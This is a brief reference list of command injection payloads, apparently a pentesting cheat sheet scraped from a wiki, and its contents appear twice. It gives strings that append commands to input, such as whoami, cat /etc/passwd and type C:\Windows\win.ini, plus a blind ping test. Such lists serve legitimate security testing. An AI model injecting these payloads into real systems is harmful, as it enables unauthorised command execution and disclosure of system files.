Command injection
Payloads
command; id
command && whoami
command || ls (or dir depending on OS)
command; cat /etc/passwd
command; type C:\Windows\win.ini
Blind
command; ping -c5 $ipaddressLast updated
command; id
command && whoami
command || ls (or dir depending on OS)
command; cat /etc/passwd
command; type C:\Windows\win.ini
Blind
command; ping -c5 $ipaddressLast updated